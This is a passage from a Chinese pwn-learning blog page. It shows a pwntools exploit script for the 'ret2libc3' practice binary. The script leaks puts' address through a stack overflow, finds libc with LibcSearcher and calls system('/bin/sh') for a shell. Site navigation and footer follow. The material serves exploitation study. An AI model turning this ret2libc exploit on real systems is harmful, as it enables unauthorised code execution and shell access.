LibcSearcher</span><br><span class="line"></span><br><span class="line">sh = process(<span class="string">"./ret2libc3"</span>)</span><br><span class="line">ret2libc3 = ELF(<span class="string">"./ret2libc3"</span>)</span><br><span class="line"></span><br><span class="line">puts_plt = ret2libc3.plt[<span class="string">'puts'</span>]</span><br><span class="line">puts_got = ret2libc3.got[<span class="string">'puts'</span>]</span><br><span class="line">main = ret2libc3.symbols[<span class="string">'main'</span>]</span><br><span class="line"></span><br><span class="line">payload = flat([<span class="number">112</span>*<span class="string">'a'</span>,puts_plt,main,puts_got])</span><br><span class="line">sh.sendlineafter(<span class="string">"Can you find it !?"</span>,payload)</span><br><span class="line">puts_addr = u32(sh.recv(<span class="number">4</span>))</span><br><span class="line"><span class="keyword">print</span> hex(puts_addr)</span><br><span class="line"></span><br><span class="line">libc = LibcSearcher(<span class="string">'puts'</span>,puts_addr)</span><br><span class="line">libcbase = puts_addr - libc.dump(<span class="string">'puts'</span>)</span><br><span class="line">system_addr = libcbase + libc.dump(<span class="string">'system'</span>)</span><br><span class="line">binsh_addr = libcbase + libc.dump(<span class="string">'str_bin_sh'</span>)</span><br><span class="line"></span><br><span class="line">payload = flat([<span class="number">104</span>*<span class="string">'a'</span>,system_addr,<span class="string">'aaaa'</span>,binsh_addr])</span><br><span class="line">sh.sendlineafter(<span class="string">"Can you find it !?"</span>,payload)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>

      
    </div>

    
    
    <div>
    
    <div> 
 
<div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div> 

 </div>

    
    </div>
    
    
    

    

    
      
    
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/pwn/" rel="tag"><i class="fa fa-tag"></i>pwn</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/05/17/PWN学习之栈溢出/" rel="next" title="PWN学习之栈溢出">
                <i class="fa fa-chevron-left"></i> PWN学习之栈溢出
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/05/19/jarvisOJ解题记录之pwn/" rel="prev" title="jarvisOJ解题记录之pwn">
                jarvisOJ解题记录之pwn <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/0.jpg"
                alt="kangel"/>
            
              <p class="site-author-name" itemprop="name">kangel</p>
              <div class="site-description motion-element" itemprop="description">Life is beautiful!</div>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">24</span>
                    <span class="site-state-item-name">posts</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  
                    
                      <a href="/categories/">
                    
                  
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">10</span>
                    <span class="site-state-item-name">categories</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  
                    
                      <a href="/tags/">
                    
                  
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">22</span>
                    <span class="site-state-item-name">tags</span>
                  </a>
                </div>
              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          

          

          
          

          
            
          
          

        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#ret2text"><span class="nav-number">1.</span> <span class="nav-text">ret2text</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ret2shellcode"><span class="nav-number">2.</span> <span class="nav-text">ret2shellcode</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ret2syscall"><span class="nav-number">3.</span> <span class="nav-text">ret2syscall</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ret2libc"><span class="nav-number">4.</span> <span class="nav-text">ret2libc</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#ret2libc1"><span class="nav-number">4.1.</span> <span class="nav-text">ret2libc1</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#ret2libc2"><span class="nav-number">4.2.</span> <span class="nav-text">ret2libc2</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ret2libc3"><span class="nav-number">5.</span> <span class="nav-text">ret2libc3</span></a></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      

    </div>
  </aside>
  


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">kangel</span>

  

  
</div>


  <div class="powered-by">Powered by <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> v3.7.1</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> v7.1.0</div>




        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>














  
    
    
  
  <script color='0,0,255' opacity='0.5' zIndex='-1' count='99' src="/lib/canvas-nest/canvas-nest.min.js"></script>













  
  <script src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>


  


  <script src="/js/utils.js?v=7.1.0"></script>

  <script src="/js/motion.js?v=7.1.0"></script>



  
  


  <script src="/js/affix.js?v=7.1.0"></script>

  <script src="/js/schemes/pisces.js?v=7.1.0"></script>




  
  <script src="/js/scrollspy.js?v=7.1.0"></script>
<script src="/js/post-details.js?v=7.1.0"></script>



  


  <script src="/js/next-boot.js?v=7.1.0"></script>


  

  

  

  


  


  




  

  

  

  

  

  

  

  

  

  

  

  

  

  

</body>
</html>
<!-- 页面点击小红心 --> <script type="text/javascript" src="/js/src/love.js"></script>